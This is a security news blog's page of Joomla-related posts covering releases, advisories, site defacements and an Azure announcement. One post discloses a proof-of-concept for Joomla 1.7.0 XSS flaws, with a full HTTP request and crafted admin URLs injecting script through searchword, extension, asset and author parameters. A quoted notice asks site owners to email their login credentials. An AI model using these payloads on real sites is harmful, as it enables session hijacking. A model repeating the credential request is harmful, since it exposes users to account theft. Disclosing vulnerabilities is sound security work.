Showing posts sorted by date for query Joomla. Sort by relevance Show all posts
Showing posts sorted by date for query Joomla. Sort by relevance Show all posts

Microsoft Azure Cloud Starts Supporting Linux (Hybrid Cloud)

Posted by Avik Sarkar On 6/09/2012 07:00:00 pm

Microsoft Azure Cloud Starts Supporting Linux (Hybrid Cloud)

If you love both Microsoft and Linux parallely then we have a great news for you and that is Microsoft is now offering Linux-based operating systems on its Windows Azure cloud service. The software giant has announced the release of a new preview version of the platform which will add Infrastructure-as-a-Service (IaaS) capabilities to it. As well as Windows Server 2008 and the release candidate of Windows Server 2012, Microsoft will be supporting openSUSE 12.1, SUSE Linux Enterprise Server 11, Ubuntu 12.04 and CentOS 6.2 on the Hyper-V virtual machines that power Azure.

Some of the Highlights:- 
  • Windows Azure Virtual Machines— Virtual Machines give you application mobility, allowing you to move your virtual hard disks (VHDs) back and forth between on-premises and the cloud.   Migrate existing workloads such as Microsoft SQL Server or Microsoft SharePoint to the cloud, bring your own customized Windows Server or Linux images, or select from a gallery.    As a common virtualization file format, VHD has been adopted by hundreds of vendors and is a freely available specification covered under the Microsoft Open Specification Promise.
  • Windows Azure Virtual Network— Virtual Network lets you provision and manage virtual private networks (VPNs) in Windows Azure as well as securely extend on-premises networks into the cloud.  It provides control over network topology, including configuration of IP addresses, routing tables and security policies and uses the industry-standard IPSEC protocol to provide a secure connection between your corporate VPN gateway and Windows Azure. 
  • Windows Azure Web Sites —Build web sites and applications with this highly elastic solution supporting .NET, Node.js, and PHP while using common deployment techniques like Git and FTP.  Windows Azure Web Sites will also allow easy deployment of open source applications like WordPress, Joomla!, DotNetNuke, Umbraco, and Drupal to the cloud with a few clicks. 
  • New tools, language support, and SDK—Windows Azure SDK June 2012 includes new developer capabilities for writing code against the latest service improvements with updated support for Java, PHP, and .NET, and the addition of Python as a supported language on Windows Azure.  Additionally, the SDK now provides 100% command line support for both Windows and Mac.
  • Availability in New Countries— Availability of Windows Azure is being expanded to customers in 48 new countries, including Russia, South Korea, Taiwan, Turkey, Egypt, South Africa, and Ukraine.  Roll-out will be complete later this month, making Windows Azure one of the most widely available cloud platforms in the industry with offerings in 89 countries and in 19 local currencies.  
These new capabilities simplify building and bringing applications of all kinds to the cloud and enable flexibility in the following areas:
  • Increased datacenter capacity through secure VPN connections to the cloud
  • Easy operations and management from an improved Windows Azure Management Portal, with powerful operational capabilities for deploying and managing your cloud applications – with similar management support from the command line
  • Cloud scale for building websites with ASP.NET, PHP, and Node.js
  • Support for additional Operating Systems and OSS language libraries for building cloud applications
  • Scale on demand by migrating existing applications to the cloud using portable, industry standard VHDs -- delivering global scale with maximum control
  • Secure connectivity between cloud and on-premises applications
  • Ability to develop, test and configure new applications in the cloud, and then deploy on-premises for production



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Security Flaws In Joomla! 2.5.1 & 2.5.0

Posted by Avik Sarkar On 3/06/2012 08:42:00 pm

Security Flaws In Joomla! 2.5.1 & 2.5.0

Few days ago the developer of Joomla officially released Version 2.5 but again history repeats. Security flaws found in the current version of Joomla. The Joomla! Developer Network also confirms this security holes and also yesterday they have released an immediate patch to disclose the vulnerability. Both Joomla version 2.5.1 and 2.5.0. has been found vulnerable to cross site scripting.

Vulnerability Description:-
Inadequate filtering leads to XSS vulnerability.

Affected Installs:-
Joomla! version 2.5.1 and 2.5.0.

Solution:-
Upgrade to version 2.5.2


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Joomla! 2.5 Released, Extra Features Included & Security Holes Closed

Posted by Avik Sarkar On 1/25/2012 11:33:00 pm

Joomla! 2.5 Released, Extra Features Included & Security Holes Closed
Earlier we have talked a lot of Joomla. Remember that few months ago The Joomla Project has released Joomla 1.7.0. After that release it goes through with many vulnerabilities. So after a long time now developers have officially released Joomla 2.5.0 

Brief About Joomla:- 
Joomla, one of the world’s most popular open source content management systems (CMS) used for everything from websites to blogs to Intranets, today announces the immediate availability of Joomla 2.5. Along with new features such as advanced search and automatic notification of Joomla core and extension updates, the Joomla CMS for the first time includes multi-database support with the addition of Microsoft SQL Server. Previous versions of Joomla were compatible exclusively with MySQL databases.

Key Features Of Joomla 2.5.0:-
  • Automatic notification when a Joomla or extension update is available. When logged into the control panel, site administrators will instantly have access to new notification buttons that allows them to see and act on the latest updates. In addition to updates for the Joomla CMS, a second button offers third party extension notification updates.
  • A better natural language search engine to the Joomla core. Complete with auto-completion and stemming (for example if you type “running” in a search field you also see run), it is faster and more versatile than the standard search.

To Download The Latest Joomla Package Click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Anonymous Took Responsibility Of Hacking Into 50+ Toronto Websites (#OccupyToronto)

Posted by Avik Sarkar On 12/05/2011 08:16:00 pm


Anonymous took responsibility of hacking into 50+ Toronto websites. In a YouTube video anon said
"We have been receiving plenty of complaints that Toronto business based websites have been hacked. People quickly assumed that OccupyTO was behind this, but luckily Anonymous stepped up to the plate for taking responsibilities for their actions. At this moment we do not know why the websites were redirect to OccupyTO’s website (www.occupyto.org). Although, this seemed to be a response to the first video that threatened to remove Toronto from the internet. All we can say at this point is that Anonymous, is stating a point that this occurred because of the cities actions to evict the protesters. A video is claiming that Anonymous attacked 50+ Toronto business based website, took down Canadian Craigslist website, and gained access to a valuable email account. We hope everything comes down to a peaceful agreement."





"It has come to our attention that some websites in Toronto have started re-directing to the occupyto.org website.  Please be advised that this action is NOT condoned by the Occupy Toronto movement, rather some individual has taken it upon themselves to compromise websites in this way. 
The issue seems to be related to websites running Joomla 1.5 or 1.6.  The solution is to check the source code of the page and search for the word ‘occupy’.  Once you have located the code you should have an indication of what article contains the script.  In some cases it may be in multiple articles.  Just edit and save each infected article and the problem should be solved.
If you are unable to solve the problem yourself, free support is being offered.  Just send an email to occupyto@blinktwice.ca with your website address and the username and password of an account that has access to edit your website.  Rest assured your login information will be held in the strictest confidence.  Once the problem is solved it is advised to change your password(s) to the site" Anonymous added.






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Multiple XSS Vulnerabilities Found in Joomla! 1.7.0

Posted by Avik Sarkar On 9/30/2011 01:49:00 pm


Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site Scripting issues.

About Joomla:- 
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.


Vulnerability Description:-
Several parameters (searchword, extension, asset, author ) in Joomla! Core components are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.


Version Affected:-
1.7.0 <=


PROOF-OF-CONCEPT/EXPLOIT:-
parameter: searchword, component: com_search (Browser: IE, Konqueror)
=======================================================
N.B. Our previous reported issue of "searchword" parameter XSS was not fixed completely.

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]

User Login is required to execute the following XSSes.

Parameter: extension, Component:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

Impact:-
Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions.

Solution:-
Upgrade to Joomla! 1.7.1-stable or higher.

To download Joomla Click Here



 
 
-News Source (Joomla!)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

17 Websites Hacked By Cool boy HaXoR

Posted by Avik Sarkar On 9/09/2011 09:08:00 am

Joomla 1.7.0 Released

Posted by Avik Sarkar On 7/21/2011 04:12:00 am


The Joomla Project is pleased to announce the immediate availability of Joomla 1.7.0. This is a security release. This is also the first release made within the new six-month release cycle that started with the delivery of Joomla 1.6 in January 2011.
The Production Leadership Team's goal is to continue to provide regular, frequent updates to the Joomla community. Learn more about Joomla! developement at the Developer Site.
To improve the platform's security, Joomla! 1.7 offers a new one-click version updating mechanism that allows users to update a site to the latest stable version with a single click. A built-in updater is also included for Joomla! and extensions. The developers hope that this will help users keep up to date with the latest version so that they are not vulnerable to any security holes found in previous versions.
Mark Dexter of the Joomla Production Leadership Team said that "the user community placed a large emphasis on making the CMS installation process as simple as possible and new versions more frequent. This will allow users to more easily and frequently migrate to the latest version of Joomla, and take advantage of all the security benefits associated with running the newest code."
Other changes include the ability to create a search menu option with pre-defined search options, improved example code for various plug-in types that developers can use to create custom extensions, an option to automatically validate form data, and multi-language improvements. The platform (libraries folder) has been split from the CMS itself in order to allow the platform "to be enhanced outside of Joomla and used for other types of development projects". The latest update also addresses a medium priority cross-site scripting (XSS) vulnerability found in version 1.6.5 and all earlier 1.6.x versions. The developers note that version 1.6.5 will reach its end of life on 19 August 2011, Joomla! 1.7 will have a support cycle of seven months, and long term support will be active for 15 months from version 1.8. All users are advised to update as soon as possible; upgrade instructions are provided.
TO download Joomla 1.7.0 Click here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

6 Joomla based Websites Hacked By Likuid Sky

Posted by Avik Sarkar On 7/03/2011 03:08:00 pm

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Joomla! 1.6 update Fixes security holes

Posted by Avik Sarkar On 6/29/2011 04:33:00 pm

The Joomla! developers have released version 1.6.4 of their open source content management system (CMS), a maintenance and security update to the 1.6 branch. The latest version addresses a total of four security vulnerabilities.The vulnerabilities include two medium priority cross-site scripting (XSS) issues, a medium priority problem related to inadequate permission checking that could allow for unauthorised access, and a low priority information disclosure hole caused by inadequate filtering. Versions up to and including 1.6.3 are reportedly affected. All users are advised to update as soon as possible.Joomla! is a widely used and easily deployed PHP-based CMS, which can be used to create anything from small web sites to corporate sites and large online applications. Examples of how it is being used can be found in the Community Showcase.Further details about the update can be found in the official release announcement. Joomla! 1.6.4 is available to download from the project's web site and is released under the GNU General Public License. The Joomla! Project is sponsored by Open Source Matters, Inc., a non-profit organization.
You May Also like:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

The Film and Publication Board’s (FPB) website, hosted (GOV SITE)

Posted by Avik Sarkar On 4/26/2011 01:03:00 am

 Another government website hacked
The Film and Publication Board’s (FPB) website, hosted at http://www.fpb.gov.za, is the latest government website to be hacked.
Visitors to the FPB website on Monday were greeted by the message “Hacked By Dr.KroOoZ - By.NeShTeR / TTG” and the PHP error code “Fatal error: Class 'JConfig' not found in…”
The recent security breaches are often related to software which is not updated, and since the FPB’s website is built on the popular Joomla Open Source Software (OSS) regular security updates are necessary to avoid hacking vulnerabilities.
Details about the FPB hacking are as yet unknown, and at the time of publication the hacking message still displayed on all web pages. It is not clear when the website will be restored.
The FPB website hacking follows security breaches of the ANC and ANC Youth League websites over the last month.
Many ANC Youth League (ANCYL) visitors were surprised on 30 March when the message “Julius Malema to Step Down as Youth League President” featured as the main story.
The ANCYL website was taken down for a short period of time after the security breach, and the article was subsequently deleted.
The ANC website was also hacked a few days ago, redirecting visitors to a Turkish website. 
According to City Press, ANC spokesperson and national executive committee member Jackson Mthembu said the hacking was in bad taste, and vowed to “unhack” the website.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search